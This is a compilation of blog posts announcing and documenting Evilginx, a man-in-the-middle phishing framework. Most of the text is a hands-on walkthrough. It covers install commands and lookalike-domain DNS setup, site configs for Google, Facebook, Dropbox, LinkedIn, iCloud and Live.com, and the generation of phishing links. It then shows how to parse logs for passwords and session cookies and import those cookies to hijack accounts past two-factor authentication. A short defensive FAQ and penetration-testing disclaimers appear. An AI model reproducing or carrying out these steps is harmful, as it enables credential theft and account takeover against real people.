#apt - everyone I met there, for sharing amazing contributions.

**Thank you!**

That's it! Thanks for being able to read this overly long post!
Enjoy the tool and I'm waiting for your feedback!
[>> Follow me on Twitter <](https:>
[>> Download Evilginx 2 from GitHub <](https:>

Evilginx 1.1 Release

1 June 2017 at 04:03
Evilginx 1.1 Release

Hello! Today I am bringing you another release of Evilginx with more bug fixes and added features. The development is going very well and the feedback from you is terrific. I've managed to address most of the requests you sent me on GitHub and I hope to address even more in the future.

If you don't know what Evilginx is, feel free to check out the first post, where I explain the subject in detail.

You can go straight to Evilginx project page on GitHub here:
>> Evilginx 1.1 on GitHub <<

Disclaimer

I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can and will do. It is the defender's responsibility to take such attacks into consideration, when setting up defenses, and find ways to protect against this phishing method.

Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.


Version 1.1

Here is the list of biggest improvements in version 1.1:

iCloud.com support

New site config was added that allows to proxy the login process of the iCloud page. This one also performs some on-the-fly modification of Javascript content to disable several domain verifications. By far, this site config was the hardest to develop.

Live.com support

Site config for Outlook/Hotmail page was added. It is fairly simple and should prove as good reference for creating your own templates.

Added support for custom SSL/TLS certificates

If you don't want to use LetsEncrypt SSL/TLS certificates, you can now specify your own public certificates and private keys when enabling the site config:

./evilginx.py setup --enable <site_name> -d <domain> --crt <path_to_public_cert_file> --key <path_to_private_key_file>
Evilginx will remember your site options

You don't have to specify the domain name or certificate paths every time you want to update your site config using --enable parameter. If the site config was enabled and set up, previously, options will be stored in the .config file. All you need to do is enable the site config:

./evilginx.py setup --enable <site_name>
Added script that updates Nginx configuration files

From now on, after every update of Evilginx, you should execute ./update.sh script that will make sure, that your Nginx configuration files are up to date. Fixes were made, in this version, to allow the web server to receive big upstream responses and allow to use long hostnames (now you can specify very long chain of subdomains for your phishing hostnames).

Fixed rare issue with parsing requests from log files

There was a known issue, specifically with using the Google site config. If the user put in their email address into the form in 1st step of the login process and shortly after, the parsing script would launch (by default it launches every minute) and truncated the log file, the intercepted email address would be lost forever, just before the user was about to enter their password.
Issue was fixed by leaving behind custom information with last known parsed email for specific IP address, in the log file, for the next parser execution.

How to update?

You can always find the latest version of Evilginx on GitHub:
>> Evilginx 1.1 on GitHub <<

# pull latest changes from GitHub
git pull
# run update script to make sure your Nginx configuration files are up-to-date
./update.sh
# re-enable every site config you may have been using to update them to their latest versions
./evilginx.py setup --enable <site_name>

Changelog

[+] Added iCloud.com support.
[+] Added Live.com support.
[+] Specifying domain name with 'setup --enable' is now optional if site was enabled before.
[+] Added ability to specify custom SSL/TLS certificates with --crt and --key arguments.
    Custom certificates will be remembered and can be removed with --use_letsencrypt parameter.
[+] Added 'server_names_hash_bucket_size: 128' to support long hostnames.
[+] Fixed rare issue, which could be triggered when only visitor's email was identified at the time
    of truncating logs, after parsing, breaking the chain of logged requests, which would miss an
    email address on next parse.
[+] Fixed several typos in site config files. (@poweroftrue)
[+] Fixed issue with Nginx proxy bailing out on receiving too big upstream responses.
[+] Fixed issue with Facebook overwriting redirection cookie with 'deleted' (@poweroftrue)
[+] Fixed "speedbump" redirection for Google site config that asks user to provide his phone number.
[+] Fixed bug that would raise exception when disabling site configs without them being enabled first.
[+] Nginx access_log directory can now be changed with VAR_LOGS constant in evilginx.py.
[+] Added 'update.sh' file which should be executed after every 'git pull' to update nginx config files.
[+] Added Dockerfile

Epilogue

I have added a development branch on GitHub where you can monitor all the latest changes. I make sure that this branch is as stable as it can get, but still minor bugs may appear, before they are put to rest. If you have any pull requests of your own, please make sure to apply them to this branch.

Development branch can be found here:
Evilginx development branch

If you have any suggestions, ideas or feedback, make sure to post them in the comments section, but it is even better to post them under issues on GitHub.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

Hit me up on Twitter @mrgretzky or directly via e-mail at [email protected].

Enjoy and see you soon!

Evilginx 1.0 Update - Up Your Game in 2FA Phishing

26 April 2017 at 04:26
Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Welcome back! It's been just a couple of weeks since Evilginx release and I'm already swimming in amazing feedback. This encouraged me to spend more time on this project and make it better. The first release was more of a proof of concept, but now I want to make it a full-blown framework, which is going to be easily expandable. In other words, Evilginx is getting modular architecture, easy installation and support for lots of new site templates.

If you want to learn more about Evilginx and how it works, please refer to the previous post, which you can find here.

Looking just for the tool? You can always find it on GitHub at its most current version:
https://github.com/kgretzky/evilginx

Disclaimer: This project is released for educational purposes and should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Evilginx v.1.0 release

This week I'm releasing the product of several weeks of work, which is an official 1.0 release. I've redone some code and put whole Evilginx's functionality into a single script file. Directory structure was reorganized to fit the modular architecture a bit more. From now, site config templates, creds config files and additional config files are organized into separate directories. It should now be easy to add your own templates just by creating new directory in sites directory and populating it with necessary config files. Evilginx will automatically detect site config presence by scanning the directory.

To summarize, here is the list of major additions and fixes:

New site config template system

As mentioned above, the new system makes it very easy to organize site templates and create new ones. All templates should be placed in separate directories under the sites directory.

One-shot fire & forget installation script (Debian only)

No more will you have to perform tedious, manual work like compiling OpenResty, setting up Nginx daemon and gluing all parts together. From now on, the whole Evilginx package can be installed by simply executing install.sh script, which you can find in project's root directory.

Evilginx.py script to setup, parse logs and generate URLs

In root directory you will find evilginx.py script, which, from now on, will act as the command center. It will install/uninstall site configs that you want to enable/disable in Nginx. It will parse the logs, harvesting login credentials and session cookies, while putting them into separate logs directory. It will also generate phishing URLs for you with specified redirection URL, which is now base64 encoded to make it less obvious.

The script, when enabling site templates, will even allow you to set up log parsing to launch every minute. Additionally, it will do the hard job for you by obtaining LetsEncrypt SSL/TLS certificates and it will automatically renew them, keeping them valid for eternity.

New site templates for popular websites

In order to figure out and introduce the structure for modular architecture, I had to create several new templates for new sites. This allowed me to design the base for every template as a foundation of the new template system.

Here is the list of new site config templates, which were introduced with this release:

  • Facebook
  • Dropbox
  • Linkedin
  • New Google sign-in page

While preparing these, I've encountered several obstacles, that I had to overcome using custom bypasses in LUA code.

Dropbox, for example, had an anti-CSRF protection that required the t parameter to be of same value as the t cookie sent with the same POST request. The POST t value was not set automatically by javascript code if site's URL differed from dropbox.com and that had to be fixed with custom LUA code.

Facebook uses two versions of their site - for desktop and for mobile. If mobile device is detected, user is redirected to m.facebook.com domain, which had to be proxied by adding additional site config file.

New Google sign-in page retrieved external javascript files from ssl.gstatic.com domain, which had to be proxied separately. Otherwise no data was retrieved from the domain, due to strict Access-Control-Allow-Origin rules that disallowed requests from domains not recognized by Google.

If you are interested in creating your own site templates, you may find the included ones very helpful in analyzing how to bypass possible issues you may encounter.


Here is the full CHANGELOG:

version 1.0 :
[+] Created central script for handling setup, parsing and generating urls.
[+] Added install.sh script that will single-handedly install Evilginx package on Debian.
[+] Added support for adding external site templates in framework-like manner.
[+] Added sites support for following websites: Facebook, Dropbox, Linkedin and new Google sign-in page.
[+] Reorganized code and directory structure to be more accessible for future development.
[+] Redirection URLs can now be embedded into phishing URLs using base64 encoding.
[+] Setup script allows to enable automatic logs parsing every minute.
[+] Setup script automatically handles SSL/TLS certificate retrieval from LetsEncrypt and its renewal.
[+] Added regular expressions for parsing POST arguments via .creds config files.
[+] Fixed: Opening Evilginx site via HTTP will now properly redirect to HTTPS.
[+] Fixed: 'Origin' and 'Referal' HTTP headers are now properly modified.
[+] Fixed: Minor bugs and stability issues.

Installation and Usage

I figured it would be wise to give you a rundown of updated Evilginx installation in a step by step manner, on a fresh VPS Debian 8 (jessie) server, which you can easily host on DigitalOcean (this link gives you $10 bonus).

Package installation

SSH to your new server, clone the Evilginx GitHub repository and launch the installation script:

apt-get update
apt-get -y install git
git clone https://github.com/kgretzky/evilginx.git
cd evilginx
chmod 700 install.sh
./install.sh

Note for previous Evilginx users: If you want to upgrade your installation, you may need to stop Nginx service first with service nginx stop. Afterwards, you can launch ./install.sh normally.

This should take a while. If all went well, you should be up and running with the whole Evilginx package installed and ready to rock. If it didn't, submit an issue to GitHub's project page and I will take a look.

Now, let's list all available site templates:

python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

For the sake of this tutorial, we will enable phishing site with google site configuration. At this moment you should have already registered a domain that you will use with Evilginx. Let's assume that domain is not-really-google.com. You can register your domain at NameCheap.

Domain setup

You should point your new domain to DigitalOcean's nameservers and specify the A record for your domain on DigitalOcean, which will point to your VPS IP address.

Now is the important part. The listing of available sites includes the subdomains information. This is the list of required subdomains that need to be included in your DNS zone configuration, for Evilgix site config to function properly.

You need to create one CNAME entry for each listed subdomain and point it to your registered domain. For example, google requires two CNAME entries:

  1. accounts.not-really.google.com which will point to not-really-google.com..
  2. ssl.not-really.google.com which will point to not-really-google.com..

If you do not know how to do any of this, refer to excellent tutorials on DigitalOcean:

  1. How to Point to DigitalOcean Nameservers From Common Domain Registrars
  2. How To Set Up a Host Name with DigitalOcean
Enabling site config

The domain should now be properly set up and all required subdomains should also be pointing at the right place. We can now enable google site configuration for Nginx.

python evilginx.py setup --enable google -d not-really-google.com

The -d not-really-google.com argument specifies the registered domain we own. Follow the prompts, answering Y to every question and Evilginx should enable log auto-parsing and automatically retrieve SSL/TLS certificates from LetsEncrypt using Certbot.

You should verify that all went well, otherwise, you may need to troubleshoot what went wrong and verify that your DNS zones are configured properly. You may also give few hours for DNS settings to propagate as it may not happen instantly.

Generating the phishing URLs

We will now generate our phishing URLs, which can be sent out:

python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ

The -r https://www.youtube.com/watch?v=dQw4w9WgXcQ argument specifies what URL the victim will be redirected to on successful login. In this scenario, it will be a rick'roll video.

As you can see, Evilginx generated two URLs. This is because one is for the old Google sign-in page and the other one is for the new one. You can pick one or the other.

Every minute, Evilginx will be parsing the logs. If anyone got phished and performed a successful login, his login credentials with session cookies will be saved in logs directory under Evilginx root directory.

Session cookies can be imported using EditThisCookie extension for Chrome. If you want to see the whole process, you may want to watch a slightly out-dated demonstration video of Evilginx (all is up-to-date except for shell commands):

Epilogue

I hope this update puts Evilginx on its path to greatness! From now on, I want to focus on adding support for more popular websites. If you happen to succeed in creating your own templates for Evilginx and you want to share, please contact me and I may put your template into official Evilginx repository.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

If you have any feedback or suggestions, contact me via the comment section, via Twitter @mrgretzky or directly via e-mail at [email protected].

Evilginx GitHub Repository

https://github.com/kgretzky/evilginx

Follow me on Twitter if you want to stay up to date.

Stay tuned for more updates and other posts!

Evilginx - Advanced Phishing with Two-factor Authentication Bypass

6 April 2017 at 04:21
Evilginx - Advanced Phishing with Two-factor Authentication Bypass

Welcome to my new post! Over the past several months I've been researching new phishing techniques that could be used in penetration testing assignments. Almost every assignment starts with grabbing the low-hanging fruit, which are often employees' credentials obtained via phishing.

In today's post I'm going to show you how to make your phishing campaigns look and feel the best way possible.

I'm releasing my latest Evilginx project, which is a man-in-the-middle attack framework for remotely capturing credentials and session cookies of any web service. It uses Nginx HTTP server to proxy legitimate login page, to visitors, and captures credentials and session cookies on-the-fly. It works remotely, uses custom domain and a valid SSL certificate. I have decided to phish Google services for Evilginx demonstration as there is no better way to assess this tool's effectiveness than stress-testing best anti-phishing protections available.

Please note that Evilginx can be adapted to work with any website, not only with Google.

Enjoy the video. If you want to learn more on how this attack works and how you can implement it yourself, do read on.

Disclaimer: This project is released for educational purposes and should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

How it works
  1. Attacker generates a phishing link pointing to his server running Evilginx: https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID
    Parameters in the URL stand for:
    rc =
    On successful sign-in, victim will be redirected to this link e.g. document hosted on Google Drive.
    rt = This is the name of the session cookie which is set in the browser only after successful sign-in. If this cookie is detected, this will be an indication for Evilginx that sign-in was successful and the victim can be redirected to URL supplied by rc parameter.
  2. Victim receives attacker's phishing link via any available communication channel (email, messenger etc.).
  3. Victim clicks the link and is presented with Evilginx's proxied Google sign-in page.
  4. Victim enters his/her valid account credentials, progresses through two-factor authentication challenge (if enabled) and he/she is redirected to URL specified by rc parameter. At this point rd cookie is saved for notreallygoogle.com domain in victim's browser. From now on, if this cookie is present, he/she will be immediately redirected to rc URL, when phishing link is re-opened.
  5. Attacker now has victim's email and password, as well as session cookies that can be imported into attacker's browser in order to take full control of the logged in session, bypassing any two-factor authentication protections enabled on victim's account.

Let's take few steps back and try to define main obstacles in traditional phishing efforts.

First and major pain with phishing for credentials is two-factor authentication. You can create the best looking template that yields you dozens of logins and passwords, but you will eventually get roadblocked when asked for verification token that arrived via SMS. Not only will it stop you from progressing further, but it will also tip off the account owner, when they receive login attempt alert.

Second issue with phishing templates is, they must allow to accept any login and password, as they have no means of confirming their validity. That will, at times, leave you with invalid credentials.

Third issue is having to create phishing templates. I don't know about you, but for me the process of copying site layout, stripping javascript, fixing CSS and writing my own replacements for stripped javascript code to make the login screen behave as the original, is extremely annoying. It feels bad to recreate something, which has already been done.

In past several months I have worked on my own ettercap-like HTTP proxy software written in C++, using Boost::Asio library for maximum efficiency. I implemented SSLstrip, DNS spoofing and HSTS bypass. This solution worked perfectly in Local Area Network, but I wondered if same ideas could be repurposed for remote phishing, without a need to use custom-made software.

I had a revelation when I read an excellent blog post by @i_bo0om. He used Nginx HTTP server's proxy_pass feature and sub_filter module to proxy the real Telegram login page to visitors, intercepting credentials and session cookies on-the-fly using man-in-the-middle attacks. This article made me realize that Nginx could be used as a proxy for external servers and it sparked the idea of Evilginx. The idea was perfect - simple and yet effective.

Allow me to talk a bit on Evilginx's research process, before I focus on installation and usage.

Evilginx Research

The core of Evilginx is the usage of Nginx HTTP proxy module. It allows to pass clients' requests to another server. This basically allows Nginx server to act as a man-in-the-middle agent, effectively intercepting all requests from clients, modifying and forwarding them to another server. Later, it intercepts server's responses, modifies them and forwads them back to clients. This setup allows Evilginx to capture credentials sent with POST request packets and upon successful sign-in, capture valid session cookies sent back from the proxied server.

In order to prevent the visitor from being redirected to the real website, all URLs with real website's domain, retrieved from the server, need to replaced with Evilginx phishing domain. This is handled by sub_filter module provided by Nginx.

Nginx implements its own logging mechanism, which will log every request in detail, including POST body and also cookies: and set-cookie: headers. I created a Python script named evilginx_parser.py, that will parse the Nginx log and extract credentials and session cookies, then save them in corresponding directories, for easy management.

There is one big issue in Nginx's logging mechanism that almost prevented Evilginx from being finished.

Take a look at the following Nginx configuration line that specifies the format in which log entries should be created:

log_format foo '$remote_addr "$request" set_cookie=$sent_http_set_cookie';

Variable $sent_http_set_cookie stores a value of set-cookie response header. These headers will contain session cookies returned from the server on successful authorization and they have to be included in the output of Nginx's access log.
Issue is, HTTP servers return cookies in multiple set-cookie headers like so:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=this_is_the_first_cookie; path=/; secure; HttpOnly
Set-Cookie: APPID=this_is_the_second_cookie; path=/;
Set-Cookie: NSAL33TTRACKER=this_is_the_third_cookie; path=/;
Server: nginx
Connection: close

For some reason Nginx's $sent_http_set_cookie variable doesn't store set-cookie header values as an array. Instead it stores only the value of the first seen set-cookie header, which in our example would be JSESSIONID=this_is_the_first_cookie; path=/; secure; HttpOnly. This is a huge problem, as it allows to log only one cookie and forget the rest. While searching the internet for possible solutions, I came across posts from 2011 about the same issue, reported by hopeless sysadmins and developers. I was positive that Nginx itself did not have any workaround.

I had two options:

  1. Modifying Nginx source code and fixing the issue myself.
  2. Developing a custom Nginx module that would allow for better packet parsing.

After a while, I knew neither of the two options were viable. They would have required me to spend huge amount of time, understanding the internals of Nginx. Neither did I want to do it or did I have that amount of time to spend on a side project.

Thankfully, I came across some interesting posts about using LUA scripting language in Nginx configuration files. I learned it was OpenResty Nginx modification, which allowed to put small scripts into site configuration files to handle packet parsing and data output.

OpenResty website describes itself as such:

OpenRestyยฎ is a full-fledged web platform that integrates the standard Nginx core, LuaJIT, many carefully written Lua libraries, lots of high quality 3rd-party Nginx modules, and most of their external dependencies. It is designed to help developers easily build scalable web applications, web services, and dynamic web gateways.

I found out that by using LUA scripting, it was possible to access set-cookie headers as an array.

Here is an example function that returns all set-cookie header values as an array:

function get_cookies()
	local cookies = ngx.header.set_cookie or {}
	if type(cookies) == "string" then
		cookies = {cookies}
	end
	return cookies
end

The big issue with logging cookies was resolved and the best part of it was, LUA scripting allowed much more in terms of packet modification, which wasn't allowed by vanilla Nginx, e.g. modification of response packet headers.

The rest of development followed swiftly. I will explain more interesting aspects of the tool as I go, while I guide you on how to install and set up everything from scratch.

Getting Your Hands Dirty

[UPDATE 2014-04-26] I've released a new version of Evilginx, which makes the installation process described in this post slightly out-of-date. For new installation instructions, refer to the latest post about Evilginx 1.0 Update.

First of all, we need a server to host Evilginx. I've used a Debian 8.7 x64 512MB RAM VPS hosted on Digital Ocean. If you use this link and create an account, you will get free $10 to spend on your servers. I've used the cheapest $5/mo server, so it should give you 2 months extra and seriously Digital Ocean is the best hosting company I've ever used.

Once our server is up and running, we need to log into it and perform upgrades, just in case:

apt-get update
apt-get upgrade

We will also need a domain that will point to our VPS. I highly recommend buying one from NameCheap (yes, this is my affiliate link, thanks!). They have never let me down and support is top notch.

I won't cover here how to set up your newly bought domain to point at your newly bought VPS. You can find excellent tutorials on Digital Ocean:

  1. How to Point to DigitalOcean Nameservers From Common Domain Registrars
  2. How To Set Up a Host Name with DigitalOcean

For the remainder of this post, let's assume that our registered domain is: notreallygoogle.com .

Installing OpenResty/Nginx

Now we can proceed to install OpenResty. We will be installing it from source. At the time of writing, most current version was 1.11.2.2, so if you want a newer version, you can check the download page for more up-to-date links.

mkdir dev
cd dev
wget https://openresty.org/download/openresty-1.11.2.2.tar.gz
tar zxvf openresty-1.11.2.2.tar.gz
cd openresty-1.11.2.2

With OpenResty unpacked, we need to install our compiler and dependency packages to compile it. The following will install Make, GCC compiler, PCRE and OpenSSL development libraries:

apt-get -y install make gcc libpcre3-dev libssl-dev

Before we compile the sources, we need to configure the installation. The following line will do the job of putting the Nginx binaries, logs and config files into proper directories. It will also enable sub_filter module and LuaJIT functionality.

./configure --user=www-data --group=www-data --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --with-http_ssl_module --with-pcre --with-http_sub_module --with-luajit

At this point, we are ready to compile and install.

make
make install

If all went well, we can verify that OpenResty was installed properly:

root@phish:~# nginx -v
nginx version: openresty/1.11.2.2

From now on, I will refer to OpenResty as Nginx. I believe it will make it less confusing.

Setting up the daemon

Nginx is now installed, but it currently won't start at boot or keep running in the background. We need to create our own systemd daemon service rules:

cat <<EOF > /etc/systemd/system/nginx.service
[Unit]
Description=The NGINX HTTP and reverse proxy server
After=syslog.target network.target remote-fs.target nss-lookup.target

[Service]
Type=forking
PIDFile=/run/nginx.pid
ExecStartPre=/usr/sbin/nginx -t
ExecStart=/usr/sbin/nginx
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=true

[Install]
WantedBy=multi-user.target
EOF

Before we launch our service for the first time, we have to properly configure Nginx.

Nginx configuration

We need to open Nginx configuration file /etc/nginx/nginx.conf with any text editor and make sure to add include /etc/nginx/sites-enabled/*; in the http {...} block. After modification, it should look something like this:

...
http {
    include       mime.types;
    default_type  application/octet-stream;

    include /etc/nginx/sites-enabled/*;
    ...
}

Nginx, from now on, will look for our site configurations in /etc/nginx/sites-enabled/ directory, where we will be putting symbolic links of files residing in /etc/nginx/sites-available/ directory. Let's create both directories:

mkdir /etc/nginx/sites-available/ /etc/nginx/sites-enabled/

We need to set up our phishing site configuration for Nginx. We will use the site configuration for phishing Google users, that is included with Evilginx package. Easiest way to be up-to-date is to clone Evilginx GitHub repository.

apt-get -y install git
cd ~
mkdir tools
cd tools
git clone https://github.com/kgretzky/evilginx
cd evilginx

Now copy Evilginx's site configuration template to /etc/nginx/sites-available/ directory. We will also replace all occurences of {{PHISH_DOMAIN}} in the template file with the name of the domain we registered, which in our case is notreallygoogle.com. When it's done, create a symbolic link to our new site configuration file in /etc/nginx/sites-enabled/ directory:

cp ./sites/evilginx-google-template.conf /etc/nginx/sites-available/evilginx-google.conf
sed -i 's/{{PHISH_DOMAIN}}/notreallygoogle.com/g' /etc/nginx/sites-available/evilginx-google.conf
ln -s /etc/nginx/sites-available/evilginx-google.conf /etc/nginx/sites-enabled/

We are almost ready. One remaining step is to install our SSL/TLS certificate to make Evilginx phishing site look legitimate and secure. We will use LetsEncrypt free SSL/TLS certificate for this purpose.

Installing SSL/TLS certificates

EFF has released an incredibly easy to use tool for obtaining valid SSL/TLS certificates from LetsEncrypt. It's called Certbot and we will use it right now.

Open your /etc/apt/sources.list file and add the following line:

deb http://ftp.debian.org/debian jessie-backports main

Now install Certbot:

apt-get update
apt-get install certbot -t jessie-backports

If all went well, we should be able to obtain our certificates now. Make sure Nginx is not running, as Certbot will need to open HTTP ports for LetsEncrypt to verify ownership of our server. Enter the following command and proceed through prompts:

certbot certonly --standalone -d notreallygoogle.com -d accounts.notreallygoogle.com

On success, our private key and public certificate chain should find its place in /etc/letsencrypt/live/notreallygoogle.com/ directory. Evilginx's site configuration already includes a setting to use SSL/TLS certificates from this directory.

Please note, that LetsEncrypt certificates are valid for 90 days, so if you plan to use your server for more than 3 months, you can add certbot renew command to your /etc/crontab and have it run every day. This will make sure your SSL/TLS certificate is renewed when its bound to expire in 30 days or less.

Starting up

Everything is ready for launch. Make sure your Nginx daemon is enabled and start it:

systemctl enable nginx
systemctl start nginx

Check if Nginx started properly with systemctl status nginx and make sure that both ports 80 and 443 are now opened by the Nginx process, by checking output of netstat -tunalp.

If anything went wrong, try to retrace your steps and see if you did everything properly. Do not hesitate to report issues in the comments section below or even better, file an issue on GitHub.

In order to create your phishing URL, you need to supply two parameters:

  1. rc = On successful sign-in, victim will be redirected to this link e.g. document hosted on Google Drive.
  2. rt = This is the name of the session cookie which is set in the browser only after successful sign-in. If this cookie is detected, this will be an indication for Evilginx that sign-in was successful and the victim can be redirected to URL supplied by rc parameter.

Let's say we want to redirect the phished victim to rick'roll video on Youtube and we know for sure that Google's session cookie name is LSID. The URL should look like this:

https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID

Try it out and see if it works for your own account.

Capturing credentials and session cookies

Nginx's site configuration is set up to output data into /var/log/evilginx-google.log file. This file will store all relevant parts of requests and responses that pass through Nginx's proxy. Log contents are hard to analyze, but we can automate its parsing.

I wrote a small Python script, called evilginx_parser.py, which will parse Nginx's log files and extract only credentials and session cookies from them. Those will be saved in separate files in directories named after extracted accounts' usernames.

I assume, you've now tested your Evilginx setup with phishing for your own account's session. Let's try to extract your captured data. Here is the script's usage page:

# ./evilginx_parser.py -h
usage: evilginx_parser.py [-h] -i INPUT -o OUTDIR -c CREDS [-x]

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input log file to parse.
  -o OUTDIR, --outdir OUTDIR
                        Directory where output files will be saved.
  -c CREDS, --creds CREDS
                        Credentials configuration file.
  -x, --truncate        Truncate log file after parsing.

All arguments should be self-explainatory apart maybe from --creds and --truncate. Argument --creds specifies the input config file, which provides info for the script, what kind of data we want to extract from the log file.

Creds config file google.creds, made for Google, looks like this:

[creds]
email_arg=Email
passwd_arg=Passwd
tokens=[{"domain":".google.com","cookies":["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]},{"domain":"accounts.google.com","cookies":["GAPS", "LSID"]}]

Creds file provides information on sign-in form username and password parameter names. It also specifies a list of cookie names that manage user's session, with assigned domain names. These will be intercepted and captured.

It is very easy to create your own .creds config files if you decide to implement phishing of other services for Evilginx.

If you supply the -x/--truncate argument, the script will truncate the log file after parsing it. This is useful if you want to automate the execution of the parser to run every minute, using cron.

Example usage of the script:

# ./evilginx_parser.py -i /var/log/evilginx-google.log -o ./logs -c google.creds -x

That should put extracted credentials and cookies into ./logs directory. Accounts are organized into separate directories, in which you will find files containing login attempts and session cookies.

Session cookies are saved in JSON format, which is fully compatible with EditThisCookie extension for Chrome. Just pick Import option in extension's window and copy-paste the JSON data into it, to impersonate the captured session.

Keep in mind that it is often best to clear all cookies from your browser before importing.

After you've imported the intercepted session cookies, open Gmail for example and you should be on the inside of the captured account.

Congratulations!

Session Hijacking FAQ

I figured, many of you may not be familiar with the method of hijacking session tokens. I'd like to shed some light on the subject by answering some questions that I often get.

Does session hijacking allow to take full control of the account, without the need to even know the user's account password?

Yes. When you import other account's session cookies into your browser, the server has no other option than to trust that you are indeed the person who logged into his own account.

How is this possible? Shouldn't there be protections to prevent this?

The only variable, which is hard to control for the attacker is the source IP address. Most web services, handling critical data, should not allow the same session token to be used from multiple IP addresses at the same time (e.g. banks). It would be wise to detect such scenario and then invalidate the session token, requiring both parties to log in again. As far as I've tested, Google doesn't care about the IP address of the account that uses a valid session token. Attacker's IP can be from different continent and still it wouldn't raise red flags for the legitimate account owner.

I believe the only reason why Google does allow to simultaneously access accounts from different IPs, using same session token, is user experience. Imagine how many users switch their IPs, while they have constant access to their Google services. They have Google signed in on their phone and PC, they move between coffee shop, work and home, where they use different wireless networks, VPNs or 3G/4G networks.

If Google was to invalidate session tokens every time IP change was detected, it would make using their services a nightmare and people would switch to easier to use alternatives.

And, no, Google Chrome does not perform any OS fingerprinting to verify legitimate owner's machine. It would be useless as it would provide less protection for people using other browsers (Firefox, Safari, Opera) and even if they did fingerprint the OS, the telemetry information would have to be somehow sent to the server, during user's sign-in. This inevitably would also allow hijacking.

Does the account owner get any alerts when he tries to log into Google through Evilginx phishing site?

Yes. On successful login, the account owner will receive a push notification to his Android phone (registered with the same Google account) and an e-mail to his address, with information that someone logged into their account from unknown IP address. The IP address will be the one of Evilginx server, as it is the one acting as a man-in-the-middle proxy and all requests to Google server originate from it.

The attacker can easily delete the "Unknown sign-in alert" e-mail after getting access to the account, but there will be no way for him to remove the push notification, sent to owner's Android phone.

Issue is, some people may ignore the alert, which will be sent exactly after they personally sign into Evilginx phishing site. They may understand the alert is a false positive, as they did sign in a minute earlier.

How would this attack fare against hardware two-factor authentication solutions?

Edit (2017/04/07):
Apparently U2F "security key" solutions check the domain you're logging into when the two-factor token is generated. In such scenario the attack won't work as the user won't be able to log in, because of the phishing domain being present instead of the legitimate one.

Thanks to kind readers who reported this!

Two-factor authentication protects the user only during the sign-in process. If user's password is stolen, 2FA acts as a backup security protection, using an additional communication channel that is less likely for an attacker to compromise (personal phone, backup e-mail account, hardware PIN generators).

On successful login, using any form of two-factor authentication, the server has to save session cookies in account's owner browser. These will be required, by the server, to verify the account owner of every sent, subsequent request.

At this point, if the attacker is in possession of session cookies, 2FA authentication methods do not matter as the account has already been compromised, since the user successfully logged in.

What will happen if I don't tick "Remember me" checkbox at Evilginx phishing page, which should make the session token temporary?

Temporary session token will be sent to user's browser as a cookie with no expiration date. This lets the browser know to remove this cookie from cache when the browser is closed. Evilginx will still capture the temporary session token and during extraction it will add its own +2 years expiration date, making it permanent this time.

If the server doesn't have any mechanism to invalidate temporary session tokens after a period of time. Tokens, they issued, may be used by an attacker for a long time, even after the account owner closes their browser.

What can I do if I my session token gets stolen? How do I prevent the attacker from accessing my account?

At this point, the best thing you can do is change your password. Mature services like Google will effectively invalidate all active session tokens, in use with your account. Additionally your password will change and the attacker won't be able to use it to log back in.

Google also provides a feature to see the list of all your active sessions, where you can invalidate them as well.

How do I not get phished like this?

Do NOT only check if the website, you are logging in to, has HTTPS with secure lock icon in the address bar. That only means that the data between you and the server is encrypted, but it won't matter if benevolent attacker secures data transport between you and his server.

Most important is to check the domain in the address bar. If the address of the sign-in page looks like this: https://accounts.mirrorgoogle.com/ServiceLogin?blahblah, put the domain name mirrorgoogle.com directly in Google search. If nothing legitimate comes up, you may be sure that you are being phished.

Conclusion

I need to stress out that Evilginx is not exploiting any vulnerability. Google still does a terrific job at protecting its users from this kind of threat. Because Evilginx acts as a proxy between the user and Google servers, Google will recognize proxy server's IP as a client and not the user's real IP address. As a result, user will still receive an alert that his account was accessed from an unknown IP (especially if the Evilginx server is hosted in a different country than phished user resides in).

I released this tool as a demonstration of how far attackers can go in hunt for your accounts and private data. If one was to fall for such ploy, not even two-factor authentication would help.

If you are a penetration tester, feel free to use this tool in testing security and threat awareness of your clients.

In the future, if the feedback is good, I plan to write a post going into details on how to create your own Evilginx configuration files in order to add support for phishing any website you want.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

I am extremely passionate about what I do and I like to work with people smarter than I am.

